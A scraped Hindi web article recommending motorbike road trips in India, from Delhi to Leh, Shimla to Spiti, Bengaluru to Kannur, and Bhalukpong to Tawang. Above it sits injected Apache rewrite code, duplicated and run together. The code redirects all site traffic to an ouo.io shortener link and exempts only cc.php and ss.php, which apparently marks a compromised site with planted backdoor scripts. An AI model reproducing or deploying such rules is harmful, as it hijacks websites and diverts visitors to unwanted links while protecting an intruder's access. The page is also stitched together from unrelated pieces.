
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 828
Previous Nextअगर आपको बाइकिंग का शौक है, तो आपका सफर और भी दिलचस्प बन सकता है। इसके लिए आपको अपनी बाइक की टंकी फुल करवानी है और बैग पैक लेकर निकल जाना है, खूबसूरत सफर पर। कई ऐसी खूबसूरत जगह हैं, तो बाइकिंग ट्रिप के लिए मशहूर है। अगर आप अपने पार्टनर के साथ रोमांटिक ट्रिप पर निकलना चाहते हैं, तो बाइकिंग ट्रिप का मजा ले सकते हैं। आइए, जानते हैं कहां की करें बाइकिंग ट्रिप।
दिल्ली से लेह: दिल्ली से लेह के बीच मोटरबाइकिंग ट्रिप को पूरा करने में करीब 15 दिन का वक्त लगता है। रूट की बात करें तो पहले दिल्ली से चंडीगढ़, फिर चंडीगढ़ से मनाली और फिर मनाली से लेह जाने में पहाड़ों की असली चढ़ाई शुरू होती है। रास्ते में आने वाले प्राकृतिक दृश्य किसी का भी मन मोह लेंगे। रास्ते में कई खतरनाक सड़के भी आती हैं, जहां बाइक चलाना किसी संघर्ष से कम नहीं।
शिमला से स्पीति वैली: मोटरबाइक से अगर आप शिमला से स्पीति घाटी के बीच का सफर तय करें तो आप हिमाचल प्रदेश के सबसे खूबसूरत और मनोरम दृश्यों में से एक की सैर कर पाएंगे। एक तरफ जहां शिमला में हरे-भरे और बर्फ से ढके पहाड़ हैं वहीं स्पीति की तरफ आगे बढ़ते हुए लैंडस्केप बदल जाता है। बर्फ से ढके पहाड़, झरने, पहाड़ों के बीच का संकुचित रास्ता और थोड़ी बहुत हरियाली के साथ भेड़ों का झुंड भी देखने को मिलता है।
बेंगलुरू से कन्नूर: अगर आप बेंगलुरु में रहते हैं और बाइक चलाने के शौकीन हैं तो आपको इस रोड ट्रिप पर जरूर जाना चाहिए। एक तरफ है शहरी इलाका बैंगलुरु तो वहीं दूसरी तरफ प्राकृतिक हरियाली को खुद में समेटे हुए केरल का खूबसूरत शहर कन्नूर। रास्ते में कई खूबसूरत झील और झरने भी हैं।
भलुकपोंग से तवांग: अगर आप भारत के नॉर्थ ईस्ट राज्यों की खूबसूरती को करीब से महसूस करना चाहते हैं, तो अरुणाचल प्रदेश स्थित भलुकपोंग से तवांग के बीच मोटरबाइक राइड का प्लान बनाएं। वैसे तो इस रोड ट्रिप के दौरान आपको इलाके की खूबसूरत वनस्पतियों के साथ ही पेड़-पौधे और एक से एक खूबसूरत चिड़िया दिखेगी लेकिन यह रास्ता कई मायनों में बेहद चुनौतीपूर्ण भी है।